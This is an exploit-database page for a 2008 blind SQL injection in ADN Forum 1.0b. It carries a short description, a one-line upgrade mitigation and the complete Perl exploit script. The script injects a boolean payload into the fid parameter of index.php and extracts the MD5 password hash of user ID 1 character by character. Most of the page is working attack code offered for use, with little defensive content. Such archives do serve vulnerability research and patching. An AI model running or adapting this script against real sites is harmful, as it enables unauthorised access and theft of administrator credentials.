ADN Forum - exploit.company

vendor:

ADN Forum

by:

StAkeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ADN Forum

Affected Version From: 1.0b

Affected Version To: 1.0b

Patch Exists: YES

Related CWE: N/A

CPE: a:adn_forum:adn_forum:1.0b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ADN Forum <= 1.0b Blind SQL Injection Exploit

This exploit is used to gain access to the MD5 hash of the password of the user with ID 1 in the ADN Forum version 1.0b. It uses a blind SQL injection vulnerability to achieve this. The exploit is written in Perl and uses the LWP::UserAgent module to send requests to the server. It then iterates through a list of characters and sends requests with the ascii value of the character in the query. If the response is successful, it adds the character to the MD5 hash and moves on to the next character.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a version of ADN Forum that is not affected by this exploit.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# --------------------------------------------------
# ADN Forum <= 1.0b Blind SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 01/10/2008
# Download: http://sourceforge.net/projects/adnforum/
# --------------------------------------------------
# Usage: perl exploit.pl http://localhost
# --------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
my @chars = (48..57, 97..102); 
my $http = new LWP::UserAgent;

for(0..32)
{
  foreach $ord(@chars) 
  {
    $send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#";
    $send = uri_escape($send);
    
    $request = $http->get($host."/index.php?fid=".$send);
    
    if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
    {
      $hash .= chr($ord); 
      $uid++;
    }
  }
}

if(defined $hash)
{
  print "[+] MD5: $hash\n";
  exit;
}
else
{
  print "[?] Exploit Failed!\n";
  exit;
}

# milw0rm.com [2008-10-01]